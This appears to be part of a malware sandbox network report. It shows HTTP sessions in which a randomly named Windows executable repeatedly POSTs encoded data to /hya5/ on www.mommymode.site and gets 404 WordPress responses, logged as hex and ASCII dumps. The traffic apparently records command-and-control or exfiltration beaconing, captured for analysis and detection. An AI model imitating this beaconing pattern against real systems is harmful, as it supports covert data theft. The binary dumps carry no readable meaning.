                                                                                                                    Oct 9, 2024 14:21:54.748594999 CEST1236INData Raw: 67 3c c4 4a 00 49 83 05 c3 d8 a9 ea ac f8 9a 8a 1c 1c 4e c8 0b ed d7 54 37 58 fb 82 4b 60 7a 5d d5 c4 60 86 10 b7 31 d2 61 f7 78 88 cf f1 c9 00 06 ad cd a9 59 ae 33 81 e1 d6 b9 49 1e 0a 3f 18 42 1f 10 7e 78 d4 ef 45 53 32 ea 7e d9 7e cb a6 bd 30
                                                                                                                    Data Ascii: g<JINT7XK`z]`1axY3I?B~xES2~~011]n`|x%2E,bkQ>*,}0|0NnK(0n<>(=e##xAZaA5}o)u33J3,
                                                                                                                    Oct 9, 2024 14:21:54.748610973 CEST1236INData Raw: 5a 29 bb bc 39 80 99 0c 02 4b 35 b3 5c e1 9c 7f e6 4c a3 a3 bd d3 bb aa 86 74 e0 93 61 67 70 67 d1 80 0e 7d 32 e8 0c f7 14 f5 5d 51 ff ce a2 be 1b d7 df 33 ae 37 a6 27 c8 7b dc 39 b9 b3 ec 04 0b 7d 72 d2 e9 8d 4f 6b 85 9e 0a 16 5c f8 85 c8 f8 af
                                                                                                                    Data Ascii: Z)9K5\Ltagpg}2]Q37'{9}rOk\&X0975C8&XnQQ&chng<B>N)*7UL%zX:Z'5*X~4.7{MQVb;.d;<)\gLG=}JZ
                                                                                                                    Oct 9, 2024 14:21:54.748764038 CEST1236INData Raw: 1b e2 0e 4a 4f 7f d5 77 f2 4a 71 47 3e 07 66 13 d0 b8 f5 c6 d7 5d 5d 99 ca 32 2e 8d 4f 7e 2d 5f ee 64 c7 2c 37 91 5b bd 7c b9 ab 36 52 3a 4f 7d f2 a3 7b dc 55 a7 cc 9c 89 d0 27 bf 14 cf 3b 99 0a b6 88 18 c7 dd 7e ad de c8 f7 dc b8 d3 bb ba b8 b4
                                                                                                                    Data Ascii: JOwJqG>f]]2.O~-_d,7[|6R:O}{U';~NOhBZt=L.cJ]Y4m07fV_Nx5XCTVP^FPPM;j*P$jPr]%GirbQk78
                                                                                                                    Oct 9, 2024 14:21:54.748780012 CEST1236INData Raw: 49 1f ff 06 f8 37 c4 bf 11 fe 8d ef 2f c1 e7 84 31 13 6c 11 31 ae ef 67 d7 ed 6d da c4 9d 4d 85 0a 2e aa 93 0f 1f 50 9a 8b d6 72 ca 82 8b 58 2b 14 8b de 9b f9 54 69 94 96 6a 16 f2 dc 6c 36 a0 11 98 5a 5a 8d a0 37 ea d6 6d 73 1e da 04 73 bc fa 36
                                                                                                                    Data Ascii: I7/1l1gmM.PrX+Tijl6ZZ7mss6v!'F0e<4T]RjR&D1''nE&4caeL7tY<*<U* ZU>@2ruR5sZq<Hav+n_,N2fp4(/'fJ[&m,
                                                                                                                    Oct 9, 2024 14:21:54.748795986 CEST1236INData Raw: 4c f2 07 ad ed da ea 92 b3 30 16 2a a7 23 96 72 b1 58 6e bc ef c4 2c af 69 d5 5e 87 0b 9a 47 0f 87 75 dd 75 b9 54 52 99 8c 05 f0 60 e4 35 42 1d 7a 2e b8 49 1e 0e 5d b4 d7 e0 6a 26 60 ce 16 0f 06 ae fa eb 90 d5 54 59 45 8d 60 d3 87 a3 5f 63 d4 4c
                                                                                                                    Data Ascii: L0*#rXn,i^GuuTR`5Bz.I]j&`TYE`_cL}0kw=_F.2cl,kpQ%kZ&v?\-:g>fvfF#Wu:1MH<}0n]e{-"Kh5s]tD=Rs 4=l
                                                                                                                    Oct 9, 2024 14:21:54.748812914 CEST1236INData Raw: ba 61 e4 2d 03 1e 60 e4 93 a4 d1 60 a1 ba e0 80 6f 5e f9 76 33 83 3d 6f b8 9d c1 55 cb 23 e2 77 cd e5 56 f6 ae af 9e 2f 78 cf 9f 80 8d eb 5d 09 b8 a1 c1 e7 08 29 b8 bc 20 1a 44 c9 d6 20 5d 96 71 6f ee 29 1d 77 1a 24 d1 10 5d df dc 5e e4 a3 51 12
                                                                                                                    Data Ascii: a-``o^v3=oU#wV/x]) D ]qo)w$]^Q:8?ObL,XMe*[w~Y,#M44KW7QUJVLJ3cM3<4fB^,X'=I{JPCwBFP&
                                                                                                                    Oct 9, 2024 14:21:54.753530979 CEST1236INData Raw: 94 34 7c 06 a4 08 15 dd c8 14 d9 60 44 73 03 86 4e 85 0a 2e 68 51 78 e3 72 e3 9c 26 0c eb 72 6b 95 2c 65 33 37 2a a5 a2 1f 6f 9e b0 c0 e2 f4 86 a3 1a f2 d9 8a 29 12 74 3a 95 c8 a6 71 7e 96 32 2e 37 2e cb 89 b1 56 79 46 30 cd b1 8c 72 21 08 37 98
                                                                                                                    Data Ascii: 4|`DsN.hQxr&rk,e37*o)t:q~2.7.VyF0r!7}rZ[('w.&<ANVd<;|qWENDi.Q\2qfw<8.d{#)4P<g-5zVHu8!/24cTf


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.449661162.241.244.106803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:56.519336939 CEST745OUTPOST /hya5/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.mommymode.site
                                                                                                                    Origin: http://www.mommymode.site
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.mommymode.site/hya5/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 50 4c 53 4d 69 73 65 4d 30 72 79 5a 31 4f 31 35 75 6d 45 5a 61 75 2b 73 71 33 43 66 78 68 55 48 77 6f 59 56 64 32 71 55 6a 63 61 33 69 66 4d 31 36 63 57 49 59 61 51 65 62 77 70 66 75 77 78 74 56 6b 5a 6a 4f 31 69 4c 4d 71 30 38 55 66 6d 42 62 4e 35 34 4d 78 45 39 2f 77 50 62 39 4f 5a 53 64 55 71 30 79 53 76 4f 5a 2b 63 47 69 61 6d 2f 7a 72 74 72 35 72 67 4a 75 78 4f 63 36 4f 72 38 31 42 77 5a 6c 65 4e 41 47 71 5a 67 6f 66 32 32 4c 6a 7a 35 57 78 64 35 65 47 49 6b 2b 73 71 65 2b 47 64 36 41 35 77 71 37 5a 59 36 67 3d
                                                                                                                    Data Ascii: AHkx=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXPLSMiseM0ryZ1O15umEZau+sq3CfxhUHwoYVd2qUjca3ifM16cWIYaQebwpfuwxtVkZjO1iLMq08UfmBbN54MxE9/wPb9OZSdUq0ySvOZ+cGiam/zrtr5rgJuxOc6Or81BwZleNAGqZgof22Ljz5Wxd5eGIk+sqe+Gd6A5wq7ZY6g=
                                                                                                                    Oct 9, 2024 14:21:57.326114893 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                    X-nginx-cache: WordPress
                                                                                                                    Content-Length: 12947
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                    Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                    Oct 9, 2024 14:21:57.326128960 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                    Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                    Oct 9, 2024 14:21:57.326143026 CEST1236INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                    Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                    Oct 9, 2024 14:21:57.326210022 CEST1236INData Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                    Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                    Oct 9, 2024 14:21:57.326221943 CEST1236INData Raw: 76 37 bb 6c 5d fd 5b 0a 21 67 c4 04 1a 40 12 26 43 d2 bc a6 3b ee ba 9a e5 53 51 42 b0 ab ab 83 b3 4e 21 e5 f9 c1 99 e0 f2 82 68 10 93 c3 e2 c4 24 00 f6 90 f0 70 72 28 a3 90 ce 95 2c ec 13 2a b8 30 34 b7 5c 20 18 18 1a 18 73 48 12 0d d1 e4 30 b1
                                                                                                                    Data Ascii: v7l][!g@&C;SQBN!h$pr(,*04\ sH06;T"U!x8:%PLLE2,:i0DqHGJTq4`'"xIzCRh99dB.Xw!.Q(:?p&Y:,@||upJQ@;4S/|
                                                                                                                    Oct 9, 2024 14:21:57.326234102 CEST1236INData Raw: 76 73 de b2 61 b7 3b 1c d6 e2 47 0a b1 0d ff 04 94 9a 94 09 e1 93 40 b0 34 6b f6 34 20 88 fb 25 df 90 66 b3 37 9b 13 4a ba 5e 1f 0f 5a e4 6b 7c eb 1e 8f 5b 58 80 4f 77 b4 1b 35 85 90 e7 e9 1a d6 1b 94 c0 c5 73 07 74 bf 57 42 8f ee 46 16 4c c7 b0
                                                                                                                    Data Ascii: vsa;G@4k4 %f7J^Zk|[XOw5stWBFLV;Ghh7hC>JwzVWwK.b21JMk)^oE?>:F.\,0yc3BY>t_wnXF7IW_.1HIcKc2B,
                                                                                                                    Oct 9, 2024 14:21:57.326246977 CEST1236INData Raw: 9f 05 3f 6b 1c c6 ce 58 cd b8 84 f0 b1 ab 6f 43 3d 54 81 2d 9c 17 12 22 12 70 d9 5a de 3b 45 3b 71 62 cd c3 cf c1 d9 b2 1e 17 f6 98 e0 b1 14 10 d9 25 9e 30 5c d6 bd af b6 e1 52 a0 32 d7 76 dc 3c 2e b6 ec 43 ba 1b 57 f3 38 59 03 17 1f f5 c8 0e a4
                                                                                                                    Data Ascii: ?kXoC=T-"pZ;E;qb%0\R2v<.CW8Y9iAr}rfJ[&oS?4uS*TyVk<r!Z-sI<fb]4jqu,3ZD^\aEjK\dZv?tY{ZLBj|RuM6UX
                                                                                                                    Oct 9, 2024 14:21:57.326316118 CEST1000INData Raw: a5 53 04 7f 82 81 05 50 dd 3c 1e 27 16 43 00 20 ab 58 3c 64 d6 16 c8 4e 8f 1e 39 67 1b 64 57 ca 56 f9 7e 98 55 37 21 76 ee f2 b8 21 5b 18 3b a7 64 b9 ce c4 63 46 94 00 35 f8 53 66 1e 86 eb 1a 6b f0 02 25 ad 66 c6 3e 08 73 d5 5c e7 a8 e6 29 d3 8b
                                                                                                                    Data Ascii: SP<'C X<dN9gdWV~U7!v![;dcF5Sfk%f>s\)YYCq5^5&V4II('YnL)q9i`NE(u&`~]F8 uc(g@<R+X:uQJ3?Nih
                                                                                                                    Oct 9, 2024 14:21:57.326405048 CEST1236INData Raw: 49 7f 80 3f bd 61 d5 53 1f ac e2 46 65 d7 d0 95 aa eb c1 9f 30 49 21 5c 22 64 d7 fd 2b 95 bc 0e a3 93 12 43 22 26 87 c5 89 49 00 ec 61 19 4e a5 02 95 a6 a0 03 a0 b8 b0 ca 6d 11 46 92 68 88 26 87 89 b5 99 df e9 a4 58 b1 48 55 08 1e ba 0d 1d 0c 74
                                                                                                                    Data Ascii: I?aSFe0I!\"d+C"&IaNmFh&XHUtbL093F[xCBqH:fjPJQEnYI ea2$]qvbxuFPM Rz>[MG( )/jN<,>_8%Wgb"-
                                                                                                                    Oct 9, 2024 14:21:57.326416016 CEST1236INData Raw: 97 30 19 33 f2 8b 84 c6 9e a5 86 2f b0 54 50 b0 a1 4a 02 2e 76 5c 2d a6 21 ce 05 d3 4f b7 1c b7 4c f0 e0 5f 63 b9 92 cb 03 76 7b a7 72 1d 00 79 c7 a4 21 bf 6a b5 cf bd fe 8b 44 d2 51 a2 06 29 d1 4c 2b 3a eb f7 aa 2d fb 0f ca e6 5d 2b d6 78 f8 ea
                                                                                                                    Data Ascii: 03/TPJ.v\-!OL_cv{ry!jDQ)L+:-]+x+W]t^/Uu|)3%N~#_}U=z/_}U=y/_}z3hpcvL7[-8xVuW{8L?wzg5uW{N^oguW{w,
                                                                                                                    Oct 9, 2024 14:21:57.331146002 CEST1236INData Raw: 6b f1 7e 7e f0 85 fb 77 96 31 9b 10 14 e3 e7 de 80 8c 02 3a f0 06 a4 4b c7 a4 ef 1d e1 ef 18 51 7a de d0 1b b9 6f 7c 1b 90 81 77 24 b0 e8 98 b8 bf 9e d7 2b fe f0 dd 9d 05 3d 82 87 7d ac aa 2a ab 27 22 92 31 75 08 63 3a 7e d7 1b e3 c1 88 b8 71 9f
                                                                                                                    Data Ascii: k~~w1:KQzo|w$+=}*'"1uc:~qRz8#~x#)HIq{;uP<)b/U){nv(=Kx4Y'e|5Myffrt"Kk4*Tq_3W*Pi:*h:mry


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.449662162.241.244.106803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:59.067800999 CEST10827OUTPOST /hya5/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.mommymode.site
                                                                                                                    Origin: http://www.mommymode.site
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.mommymode.site/hya5/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 48 4c 53 2b 71 73 65 76 63 72 31 5a 31 4f 70 70 75 6e 45 5a 61 57 2b 73 69 7a 43 65 4e 78 55 46 49 6f 58 51 52 32 39 51 50 63 56 33 69 66 4f 31 36 66 53 49 5a 59 51 64 69 33 70 63 57 77 78 74 56 6b 5a 68 47 31 30 75 34 71 7a 4d 55 65 77 52 62 42 39 34 4d 4a 45 38 57 50 50 61 49 7a 59 69 39 55 72 55 69 53 38 62 46 2b 51 47 69 59 79 66 79 75 74 72 31 30 67 4a 7a 41 4f 63 6a 72 72 37 64 42 7a 74 52 48 63 41 61 41 61 77 30 48 6b 68 76 35 71 35 71 55 57 4c 58 34 48 31 75 59 38 38 2b 54 53 49 64 74 31 49 62 46 4e 50 59 4b 76 35 62 65 39 57 52 6a 42 4c 61 72 45 58 4a 57 72 59 2f 6e 6b 6d 2b 44 7a 6d 77 56 73 6f 2f 6c 63 6b 36 61 56 6d 68 65 66 45 70 72 6b 74 74 7a 31 58 6f 36 34 48 4f 4f 74 48 54 45 65 5a 69 57 54 59 5a 35 53 62 46 63 57 65 62 38 75 44 5a 6a 66 56 53 69 53 4a 75 41 61 58 79 5a 57 71 6f 43 6b 52 43 39 6d 4d 52 56 65 50 71 4c 79 57 32 46 4f 2f 43 53 7a [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXHLS+qsevcr1Z1OppunEZaW+sizCeNxUFIoXQR29QPcV3ifO16fSIZYQdi3pcWwxtVkZhG10u4qzMUewRbB94MJE8WPPaIzYi9UrUiS8bF+QGiYyfyutr10gJzAOcjrr7dBztRHcAaAaw0Hkhv5q5qUWLX4H1uY88+TSIdt1IbFNPYKv5be9WRjBLarEXJWrY/nkm+DzmwVso/lck6aVmhefEprkttz1Xo64HOOtHTEeZiWTYZ5SbFcWeb8uDZjfVSiSJuAaXyZWqoCkRC9mMRVePqLyW2FO/CSzYTipHmLVxeql8gduo1ld3ngP6+zrhWO0pXwEqJ2EgZ/mBZpFGa0YCh8gniBuVAvRydXKtwehNv/MuT3i8Pc9PI8LQgiikpu5J7eBEz1CZLCmUU7xs6Q7cjzqb4GXB5B9zF1c52IF46qFEhXslSfAR6a7p54LZfqa34nXCDZ++cpJG2D7hm7qyElMzwyPAKjJDWkqKonIq1FSjLZ+dDJK3lO5J0sbybmCfvtCytb9EF/momv4qOeFYQzNsYpvH/fFpHCpf2Mthfv6OkySAosMK0GmXlbVVi6WfOw+O9jXlW8FXl73IUBe6/jTNQgZ4vQWQqpmHk5hYACn1dR8bJCEoJusCG5iwxPSEdvC6tfoq3BAUYhU7wnvawf7ReEJUlO36KVjtgiFtURIN/Bn+mAbauGixYszudI8FwD4N4n7UXj0apeyZBscUlzP7hro6zhi77tHXiyoH2+MJnrqqV+PQN0t3JbyqjjmQ5uO++z2i9d96gCHdcnf2rsuM5Lk2+nBestNM2wAGwpmWA9x4hrzqJq8dccOM8A6/H6S6shoYyAPruprzjsNFwH8fJxut2SnvWkQTTkPoTaIqLgoxS4/O2TMeAxQ87I6kcuDu2s5u0HLYTLjbXJHo69tmVtm9FOaEKbIycU/p0D8WKPpnKoSDNNhPwKTCCUsuY [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:21:59.854446888 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:59 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                    X-nginx-cache: WordPress
                                                                                                                    Content-Length: 12947
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 [TRUNCATED]
                                                                                                                    Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V=&,h,4]d2fm7+7k|?suJ~FbmfK:$D}U&-h9{#ecEww7w{S4F^/;v.-{acJ@|s*4e3Jm~SyFDQMqP4Qp_/ho\]t~C~OP dU4(1MTtuN&V/;;Y<)~S|-oDDcUpj_7-B)Z8Q/Uofm73N&8-<dbyuZ.X]kh#'g#rgB,l
                                                                                                                    Oct 9, 2024 14:21:59.854465961 CEST1236INData Raw: 08 4e b2 e0 d4 7e 2a 36 ad 53 0d 36 d7 92 58 0f 30 04 8b e6 da 57 94 af b5 ac 2e 61 32 99 e8 3f ed 5f 57 ad 6b 81 f3 95 c0 66 ce 9d fc 58 1d 60 a2 1a 91 60 71 c3 af 1a 1d 4c e3 7d 1e 1e 0f 02 fc 8d a2 c1 fb 3c 82 6e f4 3e ef 77 bb 21 fe 8e d9 51
                                                                                                                    Data Ascii: N~*6S6X0W.a2?_WkfX``qL}<n>w!QyY6QMs6}Ul6!N]G;mm2\(:::88uZXWllx7m\MUv=Z>cI#!D\Bx3TDKK)W_X&o]"
                                                                                                                    Oct 9, 2024 14:21:59.854479074 CEST1236INData Raw: 4d 55 08 7f 55 8e ac ee 30 94 96 07 4c 50 a1 ff 6a b5 6f e3 68 1e 27 9f 07 a4 85 03 ea 3f 11 a1 5b 38 0f 25 34 78 22 42 b7 70 1e 4a 68 f8 44 84 6e e1 3c 94 d0 e8 89 08 dd c2 79 28 a1 f1 13 11 ba 85 f3 30 42 4b ad 2c b3 e0 f7 8e bb 21 c4 57 07 67
                                                                                                                    Data Ascii: MUU0LPjoh'?[8%4x"BpJhDn<y(0BK,!WgxN\ik%K%jR&DAg)iF^{q.Uxe6ou!*|lTqm,k-e$BZ}m]~=-vMoo||".};.^X
                                                                                                                    Oct 9, 2024 14:21:59.854553938 CEST1236INData Raw: c4 da cc ef 74 52 95 a6 8b 54 85 e0 e1 a6 d0 41 7e 28 80 c5 ac 77 8a 2d 4c 67 03 b6 c3 8c 01 6b 3a 88 d2 d9 31 c1 4b b9 f4 f0 fe db 19 e8 49 cf eb 7a dd 43 92 42 c8 d9 e4 90 09 71 48 3a db ba 41 aa 3e 72 5a ee 72 53 b2 83 2f 78 1a 3b c1 4c ca 05
                                                                                                                    Data Ascii: tRTA~(w-Lgk:1KIzCBqH:A>rZrS/x;L,}dy!7Ziem<"U$a^'eIy3M.Rc.}%kv)eq'O5,jRb!U5PBim{Li5:v?lB/0OYoo{
                                                                                                                    Oct 9, 2024 14:21:59.854567051 CEST1236INData Raw: 76 37 bb 6c 5d fd 5b 0a 21 67 c4 04 1a 40 12 26 43 d2 bc a6 3b ee ba 9a e5 53 51 42 b0 ab ab 83 b3 4e 21 e5 f9 c1 99 e0 f2 82 68 10 93 c3 e2 c4 24 00 f6 90 f0 70 72 28 a3 90 ce 95 2c ec 13 2a b8 30 34 b7 5c 20 18 18 1a 18 73 48 12 0d d1 e4 30 b1
                                                                                                                    Data Ascii: v7l][!g@&C;SQBN!h$pr(,*04\ sH06;T"U!x8:%PLLE2,:i0DqHGJTq4`'"xIzCRh99dB.Xw!.Q(:?p&Y:,@||upJQ@;4S/|
                                                                                                                    Oct 9, 2024 14:21:59.854578972 CEST1236INData Raw: 76 73 de b2 61 b7 3b 1c d6 e2 47 0a b1 0d ff 04 94 9a 94 09 e1 93 40 b0 34 6b f6 34 20 88 fb 25 df 90 66 b3 37 9b 13 4a ba 5e 1f 0f 5a e4 6b 7c eb 1e 8f 5b 58 80 4f 77 b4 1b 35 85 90 e7 e9 1a d6 1b 94 c0 c5 73 07 74 bf 57 42 8f ee 46 16 4c c7 b0
                                                                                                                    Data Ascii: vsa;G@4k4 %f7J^Zk|[XOw5stWBFLV;Ghh7hC>JwzVWwK.b21JMk)^oE?>:F.\,0yc3BY>t_wnXF7IW_.1HIcKc2B,
                                                                                                                    Oct 9, 2024 14:21:59.854597092 CEST1236INData Raw: 9f 05 3f 6b 1c c6 ce 58 cd b8 84 f0 b1 ab 6f 43 3d 54 81 2d 9c 17 12 22 12 70 d9 5a de 3b 45 3b 71 62 cd c3 cf c1 d9 b2 1e 17 f6 98 e0 b1 14 10 d9 25 9e 30 5c d6 bd af b6 e1 52 a0 32 d7 76 dc 3c 2e b6 ec 43 ba 1b 57 f3 38 59 03 17 1f f5 c8 0e a4
                                                                                                                    Data Ascii: ?kXoC=T-"pZ;E;qb%0\R2v<.CW8Y9iAr}rfJ[&oS?4uS*TyVk<r!Z-sI<fb]4jqu,3ZD^\aEjK\dZv?tY{ZLBj|RuM6UX
